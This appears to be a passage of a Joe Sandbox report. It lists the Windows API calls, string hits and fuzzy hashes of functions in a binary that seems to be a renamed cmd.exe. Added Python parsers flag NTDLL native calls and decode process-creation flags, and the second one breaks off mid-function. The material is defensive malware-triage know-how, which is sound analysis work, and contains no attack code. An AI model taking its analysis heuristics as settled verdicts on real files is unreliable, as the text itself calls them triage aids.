                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3139166086-0
                                                                                                                                                                                                                          • Opcode ID: 93a6726f1c31d9821c923de16ba0d7e72e1eedd99adaf55d649aa16e1371c6d9
                                                                                                                                                                                                                          • Instruction ID: 4b82282b3829f2904ae95941d75a4a38a2011b74180bdbaf3eac684d6b54b527
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93a6726f1c31d9821c923de16ba0d7e72e1eedd99adaf55d649aa16e1371c6d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8911B23010A200AFDB25AB60ED0EFBA7F68EF85756F44411AF401918E1D7B589C1CA62
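                                                                                                                                                                                                                          The per-function API listings above are the raw material an analyst turns into call chains (to recognise library routines such as a CRT time formatter) and into a shortlist of functions that reach NTDLL without going through the Win32 layer. The following parser is an added example and is not part of the Joe Sandbox report or its IDA plugin; it assumes only the block layout visible on this page (an "APIs" header, one bullet per call as `Name.MODULE(args), ref: ADDR` or without arguments, indented "Part of subcall function ADDR:" bullets, the list ending at the next "Strings" or "Memory Dump Source" header, and an "Opcode ID" line). The Nt*/Zw*-in-NTDLL check is a triage heuristic chosen for this example, not a verdict. The sample text is constructed from two blocks copied from this page.

```python
"""Parse Joe Sandbox per-function 'APIs' listings into records and flag
functions that call NTDLL natives. Added example, not part of the report;
assumes only the block layout shown on the page."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List, Optional

# One call bullet: 'Name.MODULE(args), ref: ADDR' or 'Name.MODULE ref: ADDR',
# optionally prefixed by 'Part of subcall function ADDR:'.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.-]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address in the dumped module
    subcall_of: Optional[str] = None  # callee address when listed as a subcall


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    opcode_id: Optional[str] = None


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the listing at each 'APIs' header and collect its call bullets."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    in_apis = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            in_apis = True
            continue
        if current is None:
            continue
        if stripped in ("Strings", "Memory Dump Source"):
            in_apis = False  # end of the call list for this function
        m = API_RE.match(line)
        if in_apis and m:
            raw = m.group("args")
            args = raw.split(",") if raw else []
            current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        args, m.group("ref"), m.group("sub")))
            continue
        m = OPCODE_RE.match(line)
        if m:
            current.opcode_id = m.group("id")
    return blocks


def api_chain(block: FunctionBlock) -> str:
    """Call names in listing order, the string compared against known routines."""
    return "->".join(c.name for c in block.apis)


def native_calls(block: FunctionBlock) -> List[ApiCall]:
    """Heuristic (assumption of this example): Nt*/Zw* exports of NTDLL, i.e.
    calls that skip the Win32 layer. System binaries and the CRT use them too."""
    return [c for c in block.apis
            if c.module.upper() == "NTDLL" and re.match(r"(Nt|Zw)[A-Z]", c.name)]


# Constructed sample: two blocks copied from the report above.
SAMPLE = """\
APIs
• GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00199342
• SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00199356
• FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0019936A
• FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0019937E
• GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 001ABC07
• GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 001ABD31
Strings
Memory Dump Source
• Opcode ID: 4a2732eaf79095ac121095e55a46a727d6748a2b38163c594df8ca9622bd3144
APIs
• RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 001A4782
• NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 001A47D4
• RtlReleaseRelativeName.NTDLL(?), ref: 001A47E0
• RtlFreeUnicodeString.NTDLL(?), ref: 001A47EA
  • Part of subcall function 001A4823: NtQueryVolumeInformationFile.NTDLL ref: 001A484F
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 001A480E
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 001B096F
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B097D
Memory Dump Source
• Opcode ID: 5afd1a76a5c0d2a589fb6b690693a3803c67f633b7cf1d6623e659f9944e35f6
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(b.opcode_id, api_chain(b), [c.name for c in native_calls(b)])
```

Running it over a full report section prints one line per function: the opcode ID, the call chain, and the NTDLL natives it uses. The first sample block yields no natives (a time-formatting chain); the second yields NtOpenFile and NtQueryVolumeInformationFile, the latter tagged with the subcall address 001A4823 it was listed under.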
                                                                                                                                                                                                                          APIs
• _setjmp3.MSVCRT ref: 00194E78
  • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• NtQueryInformationProcess.NTDLL ref: 00194F28
• NtSetInformationProcess.NTDLL ref: 00194F46
• NtSetInformationProcess.NTDLL ref: 00194FAE
• longjmp.MSVCRT(001D0A30,00000001,00000000), ref: 001A91C8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
• String ID: %9d$P,Tw
• API String ID: 4212706909-2760334267
• Opcode ID: 38f1b2794b7671100ae30c61ef3d4a46d4841e73f3798123b44c40c9be19ce61
• Instruction ID: 69e69274daf6f2823ee143e929abc1c188123c66a9404e6af27129e98f877c1b
• Opcode Fuzzy Hash: 38f1b2794b7671100ae30c61ef3d4a46d4841e73f3798123b44c40c9be19ce61
• Instruction Fuzzy Hash: 0841E3B0A01311EFDB10DFA99C49E6ABFF5EB84724F14451AF614D76D0DBB08981CBA1
APIs
  • Part of subcall function 001A1D90: _wcsnicmp.MSVCRT ref: 001A1E14
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
  • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
  • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
  • Part of subcall function 001A4BAF: _wcsnicmp.MSVCRT ref: 001A4C1A
  • Part of subcall function 001A4BAF: _wcsnicmp.MSVCRT ref: 001B0B39
• memset.MSVCRT ref: 001A4975
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 001A4ABC
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001A4AF4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001A4AFF
• ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 001A4B28
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
• String ID: COPYCMD
• API String ID: 1068965577-3727491224
• Opcode ID: 981907101a870203c028f5d789c979ebacbf8b8abb21e61382c300a76ed1d24c
• Instruction ID: 4c8cb001c2a56abd97a4396d8f18870e1b85dec89967922cacc648fde4d59466
• Opcode Fuzzy Hash: 981907101a870203c028f5d789c979ebacbf8b8abb21e61382c300a76ed1d24c
• Instruction Fuzzy Hash: 65D1E539A002159BCB29DF78C895ABBB3F1EF9D304F554569E80AD7281EB70ED41CB50
APIs
• memset.MSVCRT ref: 00197A9C
• memset.MSVCRT ref: 00197AC7
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00197BCA
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00197BDC
• longjmp.MSVCRT(001D0A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 001AAE5B
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$Heap$AllocProcesslongjmp
• String ID:
• API String ID: 2656838167-0
• Opcode ID: 369ac6c67cb1315f66d92bb07a8c47237c361e356a3b05715d12b82d0a89c61e
• Instruction ID: 0cdc7c3eafc8f17046e4988bf16271e5a780930d166b6c8e092387c1f5518d2c
• Opcode Fuzzy Hash: 369ac6c67cb1315f66d92bb07a8c47237c361e356a3b05715d12b82d0a89c61e
• Instruction Fuzzy Hash: A8D10374A142159FCF38DF24C891BBEB7B1BF15300F48419DE94AA7681DB70AE81CB95
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 0f56f541fa5b24114c713ae763918ce2cdde8b03c7c7be5d3c36e498e3b21210
• Instruction ID: 3cd68914ae3b56017e51047e3b2c5c9c6333ad979b50dfbc604bfd17e21800bf
• Opcode Fuzzy Hash: 0f56f541fa5b24114c713ae763918ce2cdde8b03c7c7be5d3c36e498e3b21210
• Instruction Fuzzy Hash: 7AC1C5356083018FCB14EF24D951A6BB7E2EFA9704F44892DF8868B391EB31DD45CB92
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• wcstol.MSVCRT ref: 001A08D9
• wcstol.MSVCRT ref: 001A08F3
• wcstol.MSVCRT ref: 001A090B
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: wcstol$Heap$AllocProcess
• String ID:
• API String ID: 2343214347-0
• Opcode ID: 750fa8e9cd073dc5f7bec778e0c91645f026c41c6176504ea10a9685194b691d
• Instruction ID: 46f31cbcf24ac0a041f322cb9b16a778cc92ae1ac22649043f17659af56c7b93
• Opcode Fuzzy Hash: 750fa8e9cd073dc5f7bec778e0c91645f026c41c6176504ea10a9685194b691d
• Instruction Fuzzy Hash: 4BA1DC38A003048BDB29DFA8D895A7FBBF6EF49704F54402DE906DB641EB749C42CB90
APIs
  • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
  • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
• _pipe.MSVCRT ref: 00196B4F
• _get_osfhandle.MSVCRT ref: 00196BF7
• DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00196C05
                                                                                                                                                                                                                            • Part of subcall function 0019E950: memset.MSVCRT ref: 0019E9A0
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019E9FC
                                                                                                                                                                                                                            • Part of subcall function 0019E950: wcschr.MSVCRT ref: 0019EA14
                                                                                                                                                                                                                            • Part of subcall function 0019E950: _wcsicmp.MSVCRT ref: 0019EA80
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00196D8F
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001), ref: 001AA6D8
                                                                                                                                                                                                                            • Part of subcall function 0019A1A8: _dup.MSVCRT ref: 0019A1AF
                                                                                                                                                                                                                            • Part of subcall function 0019A1D6: _dup2.MSVCRT ref: 0019A1EA
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1441200171-0
                                                                                                                                                                                                                          • Opcode ID: fd5953b746bf6b08929ac76f0c5a45d9b0edf6f1a7ed84ad2a6e3b4a9afadf2d
                                                                                                                                                                                                                          • Instruction ID: c5355a5b26595eb932e3e6d523a9ab70ba05aa333150926b06985c52587fabda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5953b746bf6b08929ac76f0c5a45d9b0edf6f1a7ed84ad2a6e3b4a9afadf2d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA9191756002019FDF28EF24DC96B2A77E1EF99320F64852EE46AD7691DB30EC41CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B47
                                                                                                                                                                                                                          • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(001A6C76,?,001A6C76,00191000), ref: 001A6B50
                                                                                                                                                                                                                          • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,001A6C76,00191000), ref: 001A6B5B
                                                                                                                                                                                                                          • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                                          • Opcode ID: 7f0715646e8406dba98ec8788405c4866e8f374249e096eabdfb60c4da765b38
                                                                                                                                                                                                                          • Instruction ID: d83e6b6181725b8fde021a71eff2f0506bc3c53535f8d16e617b4f26c9848fc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f0715646e8406dba98ec8788405c4866e8f374249e096eabdfb60c4da765b38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D0C972043104ABCB006BE2EC0CA493F29EF44352F804002F30DC2861CA3A54818B6B
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,001BC9D0,00000108,001A2107,?,00000000,00000000,00000000), ref: 001994AA
                                                                                                                                                                                                                          • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 001994D9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001994F1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0019954A
                                                                                                                                                                                                                          • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0019955D
                                                                                                                                                                                                                            • Part of subcall function 001A1D90: _wcsnicmp.MSVCRT ref: 001A1E14
                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 001995B8
                                                                                                                                                                                                                          • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00199602
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00199624
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001ABDF1
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 001ABE0D
                                                                                                                                                                                                                          • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 001ABE26
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                                                                                                                                                                          • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                                                                                                                                                                          • API String ID: 1449572041-3461277227
                                                                                                                                                                                                                          • Opcode ID: 5cd9e4809c567f2d9b898d4dc043c705066c946eda89042c6657c20e7e075ac0
                                                                                                                                                                                                                          • Instruction ID: b4ec89dbb3bd68ab475d8867b31918f71c5940295e8a1250192ec8f8112797ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd9e4809c567f2d9b898d4dc043c705066c946eda89042c6657c20e7e075ac0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC1BF75A053549FDF24DF688C85BAA7BB9EF55304F1044AEE60AD6281EB708D80CF62
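The listings above print call arguments only as raw hex stack slots, so the security-relevant values have to be decoded by hand: the CreateProcessW at 00199602 runs with bInheritHandles=1 and dwCreationFlags 0x00080000 (EXTENDED_STARTUPINFO_PRESENT, which is why an attribute list is built first), the UpdateProcThreadAttribute sets attribute 0x00060001 with a 4-byte value, and the SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess run at 001A6B47..001A6B62 is the MSVC CRT's security-cookie failure handler, where the C0000409 shown as an "argument" to GetCurrentProcess is STATUS_STACK_BUFFER_OVERRUN already pushed for TerminateProcess (Joe Sandbox lists the top stack slots at the call site, not verified arguments; GetCurrentProcess takes none). The strings in this block (COPYCMD, =ExitCode, =ExitCodeAscii, \XCOPY.EXE) are cmd.exe's own, consistent with the report's "Drops or copies cmd.exe with a different name" signature. The parser below is an added example, not Joe Sandbox code; the sample lines are copied from this page, the flag and NTSTATUS tables are taken from the Windows SDK, and PROC_THREAD_ATTRIBUTE_EXTENDED_FLAGS = 0x00060001 is derived from the ProcThreadAttributeValue macro rather than from any public documentation.

```python
"""Parse the 'APIs' listing blocks of a Joe Sandbox function report and decode
the constants (CreateProcess flags, ProcThreadAttribute ids, NTSTATUS exit codes)
that the report prints only as raw hex stack slots. Added example, not sandbox code."""
import re
from dataclasses import dataclass
from functools import reduce
from operator import or_
from typing import Dict, List, Optional

# Constructed sample: call lines of two functions from the listing above, copied
# verbatim (bullet, optional "Part of subcall function" prefix, trailing ref).
SAMPLE = r"""
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B47
• UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(001A6C76,?,001A6C76,00191000), ref: 001A6B50
• GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,001A6C76,00191000), ref: 001A6B5B
• TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,001A6C76,00191000), ref: 001A6B62
• UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 001994D9
  • Part of subcall function 001A1D90: _wcsnicmp.MSVCRT ref: 001A1E14
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 001995B8
• CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00199602
"""

# One call line: "• [Part of subcall function X: ]Api.Module[(slots)], ref: ADDR"
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[^\s(]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constants from the Windows SDK (winbase.h / ntstatus.h).
CREATION_FLAGS: Dict[int, str] = {
    0x00000001: "DEBUG_PROCESS", 0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB", 0x08000000: "CREATE_NO_WINDOW",
}
PROC_THREAD_ATTRIBUTES: Dict[int, str] = {
    0x00020000: "PROC_THREAD_ATTRIBUTE_PARENT_PROCESS",
    0x00020002: "PROC_THREAD_ATTRIBUTE_HANDLE_LIST",
    0x00020007: "PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY",
    # Not publicly documented; ProcThreadAttributeValue(1, FALSE, TRUE, TRUE).
    0x00060001: "PROC_THREAD_ATTRIBUTE_EXTENDED_FLAGS",
}
NTSTATUS: Dict[int, str] = {0xC0000409: "STATUS_STACK_BUFFER_OVERRUN"}
# Call order of the MSVC CRT's __raise_securityfailure (benign, in most MSVC binaries).
SECURITY_FAILURE_SEQ = ("SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
                        "GetCurrentProcess", "TerminateProcess")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]              # stack slots as printed: hex, '?' (unknown) or a string
    ref: int                     # call-site address
    subcall_of: Optional[int] = None

    def slot(self, i: int) -> Optional[int]:
        """Stack slot i as an int; None when absent, unknown ('?') or not hex."""
        if i >= len(self.args):
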